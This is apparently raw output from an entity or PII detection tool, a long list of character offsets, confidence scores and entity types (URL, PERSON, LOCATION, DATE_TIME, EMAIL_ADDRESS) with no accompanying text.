start: 53576, end: 53584, score: 0.5, type: URL, start: 53683, end: 53688, score: 0.5, type: URL, start: 53732, end: 53739, score: 0.5, type: URL, start: 53754, end: 53759, score: 0.5, type: URL, start: 53855, end: 53863, score: 0.5, type: URL, start: 53889, end: 53897, score: 0.5, type: URL, start: 53998, end: 54003, score: 0.5, type: URL, start: 54060, end: 54067, score: 0.5, type: URL, start: 54082, end: 54087, score: 0.5, type: URL, start: 54096, end: 54103, score: 0.5, type: URL, start: 54157, end: 54164, score: 0.5, type: URL, start: 54215, end: 54222, score: 0.5, type: URL, start: 54264, end: 54271, score: 0.5, type: URL, start: 54325, end: 54332, score: 0.5, type: URL, start: 54454, end: 54461, score: 0.5, type: URL, start: 55139, end: 55146, score: 0.5, type: URL, start: 55203, end: 55210, score: 0.5, type: URL, start: 55215, end: 55226, score: 0.5, type: URL, start: 55376, end: 55388, score: 0.5, type: URL, start: 55504, end: 55516, score: 0.5, type: URL, start: 55913, end: 55920, score: 0.5, type: URL, start: 56385, end: 56397, score: 0.5, type: URL, start: 56609, end: 56623, score: 0.5, type: URL, start: 56638, end: 56650, score: 0.5, type: URL, start: 56749, end: 56756, score: 0.5, type: URL, start: 57204, end: 57216, score: 0.5, type: URL, start: 57471, end: 57485, score: 0.5, type: URL, start: 57500, end: 57512, score: 0.5, type: URL, start: 57732, end: 57739, score: 0.5, type: URL, start: 57844, end: 57851, score: 0.5, type: URL, start: 57883, end: 57890, score: 0.5, type: URL, start: 58025, end: 58032, score: 0.5, type: URL, start: 58205, end: 58214, score: 0.5, type: URL, start: 58354, end: 58362, score: 0.5, 
type: URL, start: 58542, end: 58549, score: 0.5, type: URL, start: 58682, end: 58694, score: 0.5, type: URL, start: 58860, end: 58867, score: 0.5, type: URL, start: 58960, end: 58969, score: 0.5, type: URL, start: 59001, end: 59008, score: 0.5, type: URL, start: 59019, end: 59031, score: 0.5, type: URL, start: 59236, end: 59245, score: 0.5, type: URL, start: 59363, end: 59370, score: 0.5, type: URL, start: 59420, end: 59427, score: 0.5, type: URL, start: 59527, end: 59534, score: 0.5, type: URL, start: 59664, end: 59675, score: 0.5, type: URL, start: 59688, end: 59695, score: 0.5, type: URL, start: 59843, end: 59854, score: 0.5, type: URL, start: 59912, end: 59919, score: 0.5, type: URL, start: 60012, end: 60019, score: 0.5, type: URL, start: 60035, end: 60042, score: 0.5, type: URL, start: 60064, end: 60071, score: 0.5, type: URL, start: 60074, end: 60081, score: 0.5, type: URL, start: 60090, end: 60097, score: 0.5, type: URL, start: 60340, end: 60347, score: 0.5, type: URL, start: 60362, end: 60373, score: 0.5, type: URL, start: 60392, end: 60399, score: 0.5, type: URL, start: 60492, end: 60499, score: 0.5, type: URL, start: 60515, end: 60522, score: 0.5, type: URL, start: 60544, end: 60551, score: 0.5, type: URL, start: 60554, end: 60561, score: 0.5, type: URL, start: 60671, end: 60693, score: 0.5, type: URL, start: 60716, end: 60723, score: 0.5, type: URL, start: 60734, end: 60746, score: 0.5, type: URL, start: 60892, end: 60899, score: 0.5, type: URL, start: 60914, end: 60921, score: 0.5, type: URL, start: 60933, end: 60940, score: 0.5, type: URL, start: 61127, end: 61133, score: 0.5, type: URL, start: 61163, end: 61170, score: 0.5, type: URL, start: 61181, end: 61193, score: 0.5, type: URL, start: 61334, end: 61340, score: 0.5, type: URL, start: 61383, end: 61390, score: 0.5, type: URL, start: 61405, end: 61412, score: 0.5, type: URL, start: 61424, end: 61431, score: 0.5, type: URL, start: 61612, end: 61623, score: 0.5, type: URL, start: 61636, end: 61643, score: 0.5, type: URL, start: 61719, end: 61726, score: 0.5, type: URL, start: 61754, end: 61761, score: 0.5, type: URL, start: 61772, end: 61784, score: 0.5, type: URL, start: 61935, end: 61946, score: 0.5, type: URL, start: 62004, end: 62011, score: 0.5, type: URL, start: 62104, end: 62111, score: 0.5, type: URL, start: 62127, end: 62134, score: 0.5, type: URL, start: 62156, end: 62163, score: 0.5, type: URL, start: 62166, end: 62173, score: 0.5, type: URL, start: 62332, end: 62340, score: 0.5, type: URL, start: 62408, end: 62416, score: 0.5, type: URL, start: 62442, end: 62449, score: 0.5, type: URL, start: 62458, end: 62466, score: 0.5, type: URL, start: 62481, end: 62488, score: 0.5, type: URL, start: 62611, end: 62619, score: 0.5, type: URL, start: 62634, end: 62641, score: 0.5, type: URL, start: 62656, end: 62668, score: 0.5, type: URL, start: 62711, end: 62723, score: 0.5, type: URL, start: 62829, end: 62839, score: 0.5, type: URL, start: 62845, end: 62852, score: 0.5, type: URL, start: 62859, end: 62866, score: 0.5, type: URL, start: 62954, end: 62962, score: 0.5, type: URL, start: 63010, end: 63017, score: 0.5, type: URL, start: 63213, end: 63220, score: 0.5, type: URL, start: 63229, end: 63237, score: 0.5, type: URL, start: 63249, end: 63256, score: 0.5, type: URL, start: 63347, end: 63359, score: 0.5, type: URL, start: 63468, end: 63476, score: 0.5, type: URL, start: 63507, end: 63514, score: 0.5, type: URL, start: 63526, end: 63533, score: 0.5, type: URL, start: 63630, end: 63642, score: 0.5, type: URL, start: 63749, 
end: 63757, score: 0.5, type: URL, start: 63788, end: 63795, score: 0.5, type: URL, start: 63807, end: 63814, score: 0.5, type: URL, start: 63911, end: 63923, score: 0.5, type: URL, start: 63976, end: 63983, score: 0.5, type: URL, start: 63994, end: 64006, score: 0.5, type: URL, start: 64053, end: 64061, score: 0.5, type: URL, start: 64093, end: 64100, score: 0.5, type: URL, start: 64163, end: 64175, score: 0.5, type: URL, start: 64239, end: 64246, score: 0.5, type: URL, start: 64255, end: 64263, score: 0.5, type: URL, start: 64286, end: 64293, score: 0.5, type: URL, start: 64358, end: 64370, score: 0.5, type: URL, start: 64435, end: 64442, score: 0.5, type: URL, start: 64452, end: 64460, score: 0.5, type: URL, start: 64483, end: 64490, score: 0.5, type: URL, start: 64557, end: 64569, score: 0.5, type: URL, start: 64636, end: 64643, score: 0.5, type: URL, start: 64653, end: 64661, score: 0.5, type: URL, start: 64684, end: 64691, score: 0.5, type: URL, start: 64837, end: 64850, score: 0.5, type: URL, start: 64889, end: 64897, score: 0.5, type: URL, start: 64920, end: 64927, score: 0.5, type: URL, start: 64939, end: 64946, score: 0.5, type: URL, start: 65116, end: 65128, score: 0.5, type: URL, start: 65174, end: 65182, score: 0.5, type: URL, start: 65205, end: 65212, score: 0.5, type: URL, start: 65224, end: 65231, score: 0.5, type: URL, start: 65384, end: 65396, score: 0.5, type: URL, start: 65442, end: 65450, score: 0.5, type: URL, start: 65473, end: 65480, score: 0.5, type: URL, start: 65492, end: 65499, score: 0.5, type: URL, start: 65667, end: 65675, score: 0.5, type: URL, start: 65723, end: 65730, score: 0.5, type: URL, start: 65739, end: 65747, score: 0.5, type: URL, start: 65762, end: 65769, score: 0.5, type: URL, start: 65797, end: 65804, score: 0.5, type: URL, start: 65959, end: 65969, score: 0.5, type: URL, start: 65975, end: 65982, score: 0.5, type: URL, start: 65989, end: 65996, score: 0.5, type: URL, start: 66074, end: 66082, score: 0.5, type: URL, start: 66213, end: 66220, score: 0.5, type: URL, start: 66307, end: 66314, score: 0.5, type: URL, start: 66359, end: 66366, score: 0.5, type: URL, start: 66545, end: 66558, score: 0.5, type: URL, start: 66611, end: 66623, score: 0.5, type: URL, start: 66657, end: 66664, score: 0.5, type: URL, start: 66725, end: 66735, score: 0.5, type: URL, start: 66741, end: 66748, score: 0.5, type: URL, start: 66755, end: 66762, score: 0.5, type: URL, start: 66840, end: 66848, score: 0.5, type: URL, start: 66986, end: 66993, score: 0.5, type: URL, start: 67090, end: 67105, score: 0.5, type: URL, start: 67127, end: 67134, score: 0.5, type: URL, start: 67143, end: 67150, score: 0.5, type: URL, start: 67341, end: 67348, score: 0.5, type: URL, start: 67409, end: 67419, score: 0.5, type: URL, start: 67425, end: 67432, score: 0.5, type: URL, start: 67439, end: 67446, score: 0.5, type: URL, start: 67524, end: 67531, score: 0.5, type: URL, start: 67595, end: 67603, score: 0.5, type: URL, start: 67727, end: 67734, score: 0.5, type: URL, start: 67821, end: 67828, score: 0.5, type: URL, start: 68008, end: 68020, score: 0.5, type: URL, start: 68097, end: 68104, score: 0.5, type: URL, start: 68138, end: 68148, score: 0.5, type: URL, start: 68154, end: 68161, score: 0.5, type: URL, start: 68168, end: 68175, score: 0.5, type: URL, start: 68253, end: 68260, score: 0.5, type: URL, start: 68271, end: 68283, score: 0.5, type: URL, start: 68330, end: 68338, score: 0.5, type: URL, start: 68462, end: 68469, score: 0.5, type: URL, start: 68685, end: 68693, score: 0.5, 
type: URL, start: 68946, end: 68954, score: 0.5, type: URL, start: 68969, end: 68976, score: 0.5, type: URL, start: 69040, end: 69052, score: 0.5, type: URL, start: 69064, end: 69071, score: 0.5, type: URL, start: 69697, end: 69704, score: 0.5, type: URL, start: 69709, end: 69731, score: 0.5, type: URL, start: 69797, end: 69804, score: 0.5, type: URL, start: 69821, end: 69830, score: 0.5, type: URL, start: 69979, end: 69986, score: 0.5, type: URL, start: 70031, end: 70038, score: 0.5, type: URL, start: 70068, end: 70075, score: 0.5, type: URL, start: 70118, end: 70128, score: 0.5, type: URL, start: 70151, end: 70158, score: 0.5, type: URL, start: 70165, end: 70172, score: 0.5, type: URL, start: 70230, end: 70238, score: 0.5, type: URL, start: 70283, end: 70290, score: 0.5, type: URL, start: 70312, end: 70319, score: 0.5, type: URL, start: 70322, end: 70329, score: 0.5, type: URL, start: 70405, end: 70412, score: 0.5, type: URL, start: 70427, end: 70434, score: 0.5, type: URL, start: 70617, end: 70624, score: 0.5, type: URL, start: 70664, end: 70671, score: 0.5, type: URL, start: 70678, end: 70685, score: 0.5, type: URL, start: 70779, end: 70786, score: 0.5, type: URL, start: 70793, end: 70800, score: 0.5, type: URL, start: 70889, end: 70896, score: 0.5, type: URL, start: 70901, end: 70923, score: 0.5, type: URL, start: 70989, end: 70996, score: 0.5, type: URL, start: 71013, end: 71022, score: 0.5, type: URL, start: 71225, end: 71232, score: 0.5, type: URL, start: 71272, end: 71279, score: 0.5, type: URL, start: 71324, end: 71331, score: 0.5, type: URL, start: 71361, end: 71368, score: 0.5, type: URL, start: 71411, end: 71421, score: 0.5, type: URL, start: 71444, end: 71451, score: 0.5, type: URL, start: 71458, end: 71465, score: 0.5, type: URL, start: 71512, end: 71519, score: 0.5, type: URL, start: 71530, end: 71542, score: 0.5, type: URL, start: 71591, end: 71599, score: 0.5, type: URL, start: 71675, end: 71682, score: 0.5, type: URL, start: 71704, end: 71711, score: 0.5, type: URL, start: 71714, end: 71721, score: 0.5, type: URL, start: 71791, end: 71798, score: 0.5, type: URL, start: 71803, end: 71825, score: 0.5, type: URL, start: 71891, end: 71898, score: 0.5, type: URL, start: 71915, end: 71924, score: 0.5, type: URL, start: 72079, end: 72086, score: 0.5, type: URL, start: 72163, end: 72170, score: 0.5, type: URL, start: 72213, end: 72223, score: 0.5, type: URL, start: 72246, end: 72253, score: 0.5, type: URL, start: 72260, end: 72267, score: 0.5, type: URL, start: 72325, end: 72333, score: 0.5, type: URL, start: 72395, end: 72402, score: 0.5, type: URL, start: 72469, end: 72476, score: 0.5, type: URL, start: 72486, end: 72495, score: 0.5, type: URL, start: 72519, end: 72526, score: 0.5, type: URL, start: 72531, end: 72553, score: 0.5, type: URL, start: 72619, end: 72626, score: 0.5, type: URL, start: 72643, end: 72652, score: 0.5, type: URL, start: 72815, end: 72822, score: 0.5, type: URL, start: 72897, end: 72904, score: 0.5, type: URL, start: 72947, end: 72957, score: 0.5, type: URL, start: 72980, end: 72987, score: 0.5, type: URL, start: 72994, end: 73001, score: 0.5, type: URL, start: 73059, end: 73067, score: 0.5, type: URL, start: 73129, end: 73136, score: 0.5, type: URL, start: 73203, end: 73210, score: 0.5, type: URL, start: 73220, end: 73229, score: 0.5, type: URL, start: 73253, end: 73260, score: 0.5, type: URL, start: 73265, end: 73287, score: 0.5, type: URL, start: 73353, end: 73360, score: 0.5, type: URL, start: 73377, end: 73386, score: 0.5, type: URL, start: 73598, 
end: 73605, score: 0.5, type: URL, start: 73680, end: 73687, score: 0.5, type: URL, start: 73730, end: 73740, score: 0.5, type: URL, start: 73763, end: 73770, score: 0.5, type: URL, start: 73777, end: 73784, score: 0.5, type: URL, start: 73842, end: 73850, score: 0.5, type: URL, start: 73912, end: 73919, score: 0.5, type: URL, start: 73986, end: 73993, score: 0.5, type: URL, start: 74003, end: 74012, score: 0.5, type: URL, start: 74033, end: 74040, score: 0.5, type: URL, start: 74093, end: 74100, score: 0.5, type: URL, start: 74151, end: 74158, score: 0.5, type: URL, start: 74207, end: 74214, score: 0.5, type: URL, start: 74266, end: 74273, score: 0.5, type: URL, start: 74325, end: 74332, score: 0.5, type: URL, start: 74598, end: 74604, score: 0.5, type: URL, start: 74699, end: 74711, score: 0.5, type: URL, start: 74857, end: 74864, score: 0.5, type: URL, start: 74907, end: 74913, score: 0.5, type: URL, start: 75138, end: 75144, score: 0.5, type: URL, start: 75289, end: 75296, score: 0.5, type: URL, start: 75339, end: 75345, score: 0.5, type: URL, start: 1644, end: 1701, score: 0.95, type: DATE_TIME, start: 38, end: 42, score: 0.85, type: NRP, start: 1064, end: 1072, score: 0.85, type: PERSON, start: 1256, end: 1293, score: 0.85, type: PERSON, start: 1644, end: 1700, score: 0.85, type: PERSON, start: 1744, end: 1752, score: 0.85, type: DATE_TIME, start: 3376, end: 3379, score: 0.85, type: DATE_TIME, start: 3420, end: 3424, score: 0.85, type: LOCATION, start: 4172, end: 4178, score: 0.85, type: PERSON, start: 4513, end: 4517, score: 0.85, type: LOCATION, start: 4777, end: 4811, score: 0.85, type: LOCATION, start: 5556, end: 5565, score: 0.85, type: PERSON, start: 5567, end: 5577, score: 0.85, type: DATE_TIME, start: 6038, end: 6071, score: 0.85, type: LOCATION, start: 7767, end: 7773, score: 0.85, type: PERSON, start: 7942, end: 7954, score: 0.85, type: PERSON, start: 9050, end: 9055, score: 0.85, type: PERSON, start: 9640, end: 9645, score: 0.85, type: PERSON, start: 11416, end: 11455, score: 0.85, type: PERSON, start: 11914, end: 11924, score: 0.85, type: PERSON, start: 12242, end: 12252, score: 0.85, type: PERSON, start: 13415, end: 13449, score: 0.85, type: PERSON, start: 13963, end: 13980, score: 0.85, type: PERSON, start: 14003, end: 14014, score: 0.85, type: LOCATION, start: 14062, end: 14071, score: 0.85, type: LOCATION, start: 14128, end: 14137, score: 0.85, type: LOCATION, start: 14193, end: 14202, score: 0.85, type: PERSON, start: 14367, end: 14374, score: 0.85, type: LOCATION, start: 14686, end: 14688, score: 0.85, type: PERSON, start: 14690, end: 14695, score: 0.85, type: PERSON, start: 14886, end: 14903, score: 0.85, type: LOCATION, start: 15412, end: 15429, score: 0.85, type: LOCATION, start: 15541, end: 15558, score: 0.85, type: LOCATION, start: 15670, end: 15687, score: 0.85, type: LOCATION, start: 15706, end: 15717, score: 0.85, type: LOCATION, start: 15801, end: 15818, score: 0.85, type: LOCATION, start: 15926, end: 15943, score: 0.85, type: LOCATION, start: 16051, end: 16068, score: 0.85, type: PERSON, start: 16199, end: 16209, score: 0.85, type: DATE_TIME, start: 16695, end: 16719, score: 0.85, type: PERSON, start: 16889, end: 16894, score: 0.85, type: PERSON, start: 17443, end: 17448, score: 0.85, type: PERSON, start: 18930, end: 18934, score: 0.85, type: PERSON, start: 19315, end: 19345, score: 0.85, type: PERSON, start: 19838, end: 19862, score: 0.85, type: PERSON, start: 20196, end: 20220, score: 0.85, type: LOCATION, start: 20544, end: 20573, score: 0.85, type: 
PERSON, start: 21319, end: 21359, score: 0.85, type: PERSON, start: 21578, end: 21635, score: 0.85, type: PERSON, start: 21984, end: 22036, score: 0.85, type: PERSON, start: 22091, end: 22143, score: 0.85, type: LOCATION, start: 22200, end: 22232, score: 0.85, type: PERSON, start: 22234, end: 22241, score: 0.85, type: PERSON, start: 22289, end: 22296, score: 0.85, type: PERSON, start: 22796, end: 22817, score: 0.85, type: LOCATION, start: 23508, end: 23534, score: 0.85, type: LOCATION, start: 24908, end: 24916, score: 0.85, type: PERSON, start: 24918, end: 24931, score: 0.85, type: LOCATION, start: 25124, end: 25133, score: 0.85, type: URL, start: 26456, end: 26466, score: 0.85, type: PERSON, start: 26544, end: 26558, score: 0.85, type: LOCATION, start: 26676, end: 26690, score: 0.85, type: PERSON, start: 26984, end: 26998, score: 0.85, type: URL, start: 27015, end: 27024, score: 0.85, type: LOCATION, start: 27140, end: 27144, score: 0.85, type: PERSON, start: 27273, end: 27282, score: 0.85, type: PERSON, start: 27489, end: 27500, score: 0.85, type: URL, start: 27854, end: 27864, score: 0.85, type: PERSON, start: 30067, end: 30081, score: 0.85, type: PERSON, start: 30848, end: 30856, score: 0.85, type: PERSON, start: 31363, end: 31374, score: 0.85, type: PERSON, start: 32492, end: 32524, score: 0.85, type: PERSON, start: 32627, end: 32645, score: 0.85, type: PERSON, start: 33544, end: 33577, score: 0.85, type: PERSON, start: 34020, end: 34031, score: 0.85, type: PERSON, start: 34048, end: 34056, score: 0.85, type: PERSON, start: 35690, end: 35697, score: 0.85, type: PERSON, start: 35783, end: 35790, score: 0.85, type: LOCATION, start: 36021, end: 36029, score: 0.85, type: URL, start: 12733, end: 12756, score: 0.6, type: URL, start: 16325, end: 16348, score: 0.6, type: URL, start: 28598, end: 28654, score: 0.6, type: URL, start: 31785, end: 31809, score: 0.6, type: URL, start: 700, end: 706, score: 0.5, type: URL, start: 732, end: 738, score: 0.5, type: URL, start: 1204, end: 1210, score: 0.5, type: URL, start: 1220, end: 1230, score: 0.5, type: URL, start: 1256, end: 1262, score: 0.5, type: URL, start: 1272, end: 1282, score: 0.5, type: URL, start: 1349, end: 1359, score: 0.5, type: URL, start: 1402, end: 1412, score: 0.5, type: URL, start: 1463, end: 1473, score: 0.5, type: URL, start: 1515, end: 1525, score: 0.5, type: URL, start: 1540, end: 1549, score: 0.5, type: URL, start: 1561, end: 1571, score: 0.5, type: URL, start: 1613, end: 1623, score: 0.5, type: URL, start: 2206, end: 2214, score: 0.5, type: URL, start: 2352, end: 2362, score: 0.5, type: URL, start: 2779, end: 2789, score: 0.5, type: URL, start: 2861, end: 2871, score: 0.5, type: URL, start: 2939, end: 2949, score: 0.5, type: URL, start: 3004, end: 3013, score: 0.5, type: URL, start: 3112, end: 3120, score: 0.5, type: URL, start: 3233, end: 3243, score: 0.5, type: URL, start: 3710, end: 3720, score: 0.5, type: URL, start: 3860, end: 3870, score: 0.5, type: URL, start: 3938, end: 3948, score: 0.5, type: URL, start: 4014, end: 4024, score: 0.5, type: URL, start: 4091, end: 4101, score: 0.5, type: URL, start: 4198, end: 4208, score: 0.5, type: URL, start: 4417, end: 4426, score: 0.5, type: URL, start: 4478, end: 4488, score: 0.5, type: URL, start: 4618, end: 4628, score: 0.5, type: URL, start: 4740, end: 4749, score: 0.5, type: URL, start: 4943, end: 4953, score: 0.5, type: URL, start: 5024, end: 5029, score: 0.5, type: URL, start: 5064, end: 5073, score: 0.5, type: URL, start: 5101, end: 5110, score: 0.5, type: URL, start: 
5216, end: 5225, score: 0.5, type: URL, start: 5231, end: 5241, score: 0.5, type: URL, start: 5322, end: 5331, score: 0.5, type: URL, start: 5642, end: 5652, score: 0.5, type: URL, start: 5709, end: 5716, score: 0.5, type: URL, start: 5771, end: 5778, score: 0.5, type: URL, start: 5846, end: 5853, score: 0.5, type: URL, start: 5930, end: 5940, score: 0.5, type: URL, start: 5985, end: 5992, score: 0.5, type: URL, start: 6131, end: 6138, score: 0.5, type: URL, start: 6161, end: 6181, score: 0.5, type: URL, start: 6216, end: 6226, score: 0.5, type: URL, start: 6391, end: 6399, score: 0.5, type: URL, start: 6461, end: 6471, score: 0.5, type: URL, start: 6505, end: 6514, score: 0.5, type: URL, start: 6541, end: 6550, score: 0.5, type: URL, start: 6850, end: 6856, score: 0.5, type: URL, start: 6965, end: 6975, score: 0.5, type: URL, start: 7299, end: 7309, score: 0.5, type: URL, start: 7560, end: 7569, score: 0.5, type: URL, start: 7957, end: 7967, score: 0.5, type: URL, start: 8013, end: 8023, score: 0.5, type: URL, start: 8075, end: 8084, score: 0.5, type: URL, start: 8187, end: 8196, score: 0.5, type: URL, start: 10552, end: 10562, score: 0.5, type: URL, start: 10639, end: 10646, score: 0.5, type: URL, start: 10779, end: 10788, score: 0.5, type: URL, start: 10985, end: 10995, score: 0.5, type: URL, start: 11009, end: 11019, score: 0.5, type: URL, start: 11085, end: 11095, score: 0.5, type: URL, start: 11128, end: 11138, score: 0.5, type: URL, start: 11142, end: 11147, score: 0.5, type: URL, start: 11183, end: 11192, score: 0.5, type: URL, start: 11198, end: 11203, score: 0.5, type: URL, start: 11236, end: 11245, score: 0.5, type: URL, start: 11498, end: 11508, score: 0.5, type: URL, start: 11511, end: 11521, score: 0.5, type: URL, start: 12036, end: 12048, score: 0.5, type: URL, start: 12106, end: 12116, score: 0.5, type: URL, start: 12159, end: 12171, score: 0.5, type: URL, start: 12223, end: 12234, score: 0.5, type: URL, start: 12260, end: 12271, score: 0.5, type: URL, start: 12427, end: 12433, score: 0.5, type: URL, start: 12452, end: 12457, score: 0.5, type: URL, start: 12485, end: 12491, score: 0.5, type: URL, start: 12510, end: 12515, score: 0.5, type: URL, start: 12565, end: 12571, score: 0.5, type: URL, start: 12588, end: 12594, score: 0.5, type: URL, start: 12641, end: 12649, score: 0.5, type: URL, start: 13346, end: 13355, score: 0.5, type: URL, start: 13427, end: 13437, score: 0.5, type: URL, start: 13471, end: 13480, score: 0.5, type: URL, start: 13753, end: 13763, score: 0.5, type: URL, start: 13820, end: 13826, score: 0.5, type: URL, start: 13841, end: 13847, score: 0.5, type: URL, start: 13948, end: 13957, score: 0.5, type: URL, start: 14840, end: 14850, score: 0.5, type: URL, start: 14906, end: 14916, score: 0.5, type: URL, start: 14949, end: 14955, score: 0.5, type: URL, start: 14971, end: 14981, score: 0.5, type: URL, start: 15004, end: 15010, score: 0.5, type: URL, start: 16354, end: 16362, score: 0.5, type: URL, start: 16407, end: 16417, score: 0.5, type: URL, start: 16509, end: 16519, score: 0.5, type: URL, start: 16544, end: 16555, score: 0.5, type: URL, start: 16764, end: 16774, score: 0.5, type: URL, start: 16866, end: 16876, score: 0.5, type: URL, start: 16948, end: 16957, score: 0.5, type: URL, start: 17317, end: 17327, score: 0.5, type: URL, start: 17420, end: 17430, score: 0.5, type: URL, start: 17543, end: 17550, score: 0.5, type: URL, start: 17906, end: 17916, score: 0.5, type: URL, start: 17975, end: 17985, score: 0.5, type: URL, start: 18030, end: 18040, score: 
0.5, type: URL, start: 18190, end: 18200, score: 0.5, type: URL, start: 18273, end: 18281, score: 0.5, type: URL, start: 18581, end: 18587, score: 0.5, type: URL, start: 18670, end: 18676, score: 0.5, type: URL, start: 18694, end: 18700, score: 0.5, type: URL, start: 18786, end: 18795, score: 0.5, type: URL, start: 19053, end: 19063, score: 0.5, type: URL, start: 19106, end: 19115, score: 0.5, type: URL, start: 19315, end: 19322, score: 0.5, type: URL, start: 19325, end: 19335, score: 0.5, type: URL, start: 19384, end: 19393, score: 0.5, type: URL, start: 21223, end: 21232, score: 0.5, type: URL, start: 21339, end: 21349, score: 0.5, type: URL, start: 21663, end: 21673, score: 0.5, type: URL, start: 21723, end: 21732, score: 0.5, type: URL, start: 21856, end: 21865, score: 0.5, type: URL, start: 21885, end: 21895, score: 0.5, type: URL, start: 22265, end: 22275, score: 0.5, type: URL, start: 22325, end: 22334, score: 0.5, type: URL, start: 22362, end: 22371, score: 0.5, type: URL, start: 22881, end: 22885, score: 0.5, type: URL, start: 22905, end: 22909, score: 0.5, type: URL, start: 23052, end: 23060, score: 0.5, type: URL, start: 24191, end: 24200, score: 0.5, type: URL, start: 24209, end: 24219, score: 0.5, type: URL, start: 24380, end: 24386, score: 0.5, type: URL, start: 24539, end: 24544, score: 0.5, type: URL, start: 24574, end: 24584, score: 0.5, type: URL, start: 24679, end: 24689, score: 0.5, type: URL, start: 24770, end: 24780, score: 0.5, type: URL, start: 24824, end: 24834, score: 0.5, type: URL, start: 24875, end: 24884, score: 0.5, type: URL, start: 25042, end: 25052, score: 0.5, type: URL, start: 25072, end: 25080, score: 0.5, type: URL, start: 25145, end: 25156, score: 0.5, type: URL, start: 25219, end: 25230, score: 0.5, type: URL, start: 25260, end: 25269, score: 0.5, type: URL, start: 25290, end: 25298, score: 0.5, type: URL, start: 25337, end: 25348, score: 0.5, type: URL, start: 25386, end: 25396, score: 0.5, type: URL, start: 25443, end: 25448, score: 0.5, type: URL, start: 25522, end: 25532, score: 0.5, type: URL, start: 25578, end: 25588, score: 0.5, type: URL, start: 25815, end: 25824, score: 0.5, type: URL, start: 25944, end: 25953, score: 0.5, type: URL, start: 25959, end: 25964, score: 0.5, type: URL, start: 25996, end: 26005, score: 0.5, type: URL, start: 26311, end: 26318, score: 0.5, type: URL, start: 26386, end: 26393, score: 0.5, type: URL, start: 26408, end: 26415, score: 0.5, type: URL, start: 26486, end: 26496, score: 0.5, type: URL, start: 26577, end: 26586, score: 0.5, type: URL, start: 26618, end: 26627, score: 0.5, type: URL, start: 26659, end: 26668, score: 0.5, type: URL, start: 26694, end: 26703, score: 0.5, type: URL, start: 26845, end: 26854, score: 0.5, type: URL, start: 26872, end: 26881, score: 0.5, type: URL, start: 26900, end: 26909, score: 0.5, type: URL, start: 27184, end: 27194, score: 0.5, type: URL, start: 27219, end: 27228, score: 0.5, type: URL, start: 27461, end: 27471, score: 0.5, type: URL, start: 27503, end: 27508, score: 0.5, type: URL, start: 27669, end: 27679, score: 0.5, type: URL, start: 27998, end: 28007, score: 0.5, type: URL, start: 28974, end: 28983, score: 0.5, type: URL, start: 29000, end: 29012, score: 0.5, type: URL, start: 29465, end: 29473, score: 0.5, type: URL, start: 29906, end: 29915, score: 0.5, type: URL, start: 29990, end: 30001, score: 0.5, type: URL, start: 30037, end: 30046, score: 0.5, type: URL, start: 30122, end: 30131, score: 0.5, type: URL, start: 30208, end: 30217, score: 0.5, type: URL, start: 
30302, end: 30311, score: 0.5, type: URL, start: 30404, end: 30413, score: 0.5, type: URL, start: 30506, end: 30515, score: 0.5, type: URL, start: 30656, end: 30665, score: 0.5, type: URL, start: 30754, end: 30763, score: 0.5, type: URL, start: 30873, end: 30882, score: 0.5, type: URL, start: 30983, end: 30992, score: 0.5, type: URL, start: 31119, end: 31128, score: 0.5, type: URL, start: 31381, end: 31387, score: 0.5, type: URL, start: 31422, end: 31436, score: 0.5, type: URL, start: 31516, end: 31525, score: 0.5, type: URL, start: 31597, end: 31606, score: 0.5, type: URL, start: 31624, end: 31634, score: 0.5, type: URL, start: 32138, end: 32146, score: 0.5, type: URL, start: 32164, end: 32174, score: 0.5, type: URL, start: 32205, end: 32214, score: 0.5, type: URL, start: 32288, end: 32298, score: 0.5, type: URL, start: 32344, end: 32354, score: 0.5, type: URL, start: 32393, end: 32403, score: 0.5, type: URL, start: 32504, end: 32514, score: 0.5, type: URL, start: 32568, end: 32578, score: 0.5, type: URL, start: 32636, end: 32644, score: 0.5, type: URL, start: 32670, end: 32680, score: 0.5, type: URL, start: 32707, end: 32717, score: 0.5, type: URL, start: 32741, end: 32751, score: 0.5, type: URL, start: 33116, end: 33126, score: 0.5, type: URL, start: 33210, end: 33228, score: 0.5, type: URL, start: 33245, end: 33254, score: 0.5, type: URL, start: 33317, end: 33326, score: 0.5, type: URL, start: 33390, end: 33399, score: 0.5, type: URL, start: 33461, end: 33471, score: 0.5, type: URL, start: 33753, end: 33762, score: 0.5, type: URL, start: 33765, end: 33775, score: 0.5, type: URL, start: 33845, end: 33855, score: 0.5, type: URL, start: 34092, end: 34100, score: 0.5, type: URL, start: 34136, end: 34149, score: 0.5, type: URL, start: 34192, end: 34196, score: 0.5, type: URL, start: 34232, end: 34239, score: 0.5, type: URL, start: 34275, end: 34292, score: 0.5, type: URL, start: 34328, end: 34335, score: 0.5, type: URL, start: 34415, end: 34425, score: 0.5, type: URL, start: 34490, end: 34499, score: 0.5, type: URL, start: 34563, end: 34573, score: 0.5, type: URL, start: 34624, end: 34633, score: 0.5, type: URL, start: 34675, end: 34684, score: 0.5, type: URL, start: 34691, end: 34701, score: 0.5, type: URL, start: 34770, end: 34780, score: 0.5, type: URL, start: 34887, end: 34897, score: 0.5, type: URL, start: 34938, end: 34948, score: 0.5, type: URL, start: 35700, end: 35710, score: 0.5, type: URL, start: 35761, end: 35773, score: 0.5, type: URL, start: 35859, end: 35869, score: 0.5, type: URL, start: 36237, end: 36243, score: 0.5, type: URL, start: 36293, end: 36302, score: 0.5, type: EMAIL_ADDRESS, start: 48, end: 63, score: 1.0, type: DATE_TIME, start: 31, end: 35, score: 0.85, type: PERSON, start: 36, end: 47, score: 0.85, type: LOCATION, start: 929, end: 936, score: 0.85, type: PERSON, start: 959, end: 966, score: 0.85, type: PERSON, start: 2384, end: 2397, score: 0.85, type: PERSON, start: 3348, end: 3353, score: 0.85, type: PERSON, start: 6107, end: 6112, score: 0.85, type: PERSON, start: 8179, end: 8184, score: 0.85, type: PERSON, start: 8508, end: 8513, score: 0.85, type: PERSON, start: 11209, end: 11214, score: 0.85, type: PERSON, start: 13406, end: 13411, score: 0.85, type: PERSON, start: 13549, end: 13571, score: 0.85, type: DATE_TIME, start: 16412, end: 16429, score: 0.85, type: DATE_TIME, start: 16455, end: 16472, score: 0.85, type: DATE_TIME, start: 17249, end: 17266, score: 0.85, type: DATE_TIME, start: 17292, end: 17309, score: 0.85, type: NRP, start: 19243, end: 19281, 
